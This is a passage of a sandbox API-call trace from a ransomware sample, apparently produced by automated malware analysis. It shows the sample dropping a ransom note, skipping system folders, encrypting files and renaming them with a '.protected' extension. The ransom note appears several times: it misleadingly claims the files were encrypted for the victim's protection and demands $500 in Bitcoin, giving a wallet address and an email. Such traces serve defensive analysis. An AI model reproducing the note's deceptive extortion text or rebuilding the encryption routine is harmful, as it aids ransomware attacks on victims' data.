SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.021] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.022] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.022] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.022] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.022] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0096.022] CloseHandle (hObject=0xb4) returned 1 [0096.023] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.023] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.023] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\RESTORE_FILES.txt") returned 46 [0096.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.023] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.023] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.024] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.024] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.024] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.024] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0096.024] CloseHandle (hObject=0xa4) returned 1 [0096.024] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Windows") returned -1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Program Files") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Program Files (x86)") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="$Recycle.bin") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="System Volume Information") returned -1 [0096.024] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV") returned 31 [0096.024] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0096.024] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0096.024] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned 33 [0096.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0096.025] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\.") returned 33 [0096.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.025] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.025] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\." (normalized: "c:\\users\\public\\recorded tv\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.025] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\..") returned 34 [0096.025] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.025] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.025] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.025] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.026] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.026] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.027] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x50, lpOverlapped=0x0) returned 1 [0096.027] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.027] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x50, lpOverlapped=0x0) returned 1 [0096.028] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.028] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0096.028] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0096.028] CloseHandle (hObject=0xb4) returned 1 [0096.028] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.protected") returned 53 [0096.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.protected" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.protected")) returned 1 [0096.029] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Windows") returned -1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Program Files") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Program Files (x86)") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="$Recycle.bin") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="System Volume Information") returned -1 [0096.029] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned 44 [0096.029] lstrcmpW (lpString1="Sample Media", lpString2=".") returned 1 [0096.029] lstrcmpW (lpString1="Sample Media", lpString2="..") returned 1 [0096.029] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 46 [0096.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0096.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.029] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.") returned 46 [0096.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.029] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.029] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\." (normalized: "c:\\users\\public\\recorded tv\\sample media\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.030] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.030] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.030] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\..") returned 47 [0096.030] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.030] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.030] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.." (normalized: "c:\\users\\public\\recorded tv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.030] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.030] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.030] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.030] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.031] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.031] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.031] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.031] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xab, lpOverlapped=0x0) returned 1 [0096.032] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xab, lpOverlapped=0x0) returned 1 [0096.032] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.032] CloseHandle (hObject=0xd4) returned 1 [0096.032] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.protected") returned 66 [0096.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.protected" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.protected")) returned 1 [0096.033] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Windows") returned -1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Program Files") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Program Files (x86)") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="$Recycle.bin") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="System Volume Information") returned 1 [0096.033] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.033] StrStrIW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".protected") returned 0x0 [0096.033] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="RESTORE_FILES.txt") returned 1 [0096.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".txt") returned 0x0 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".rar") returned 0x0 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".zip") returned 0x0 [0096.034] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.061] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.061] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.062] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.062] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, 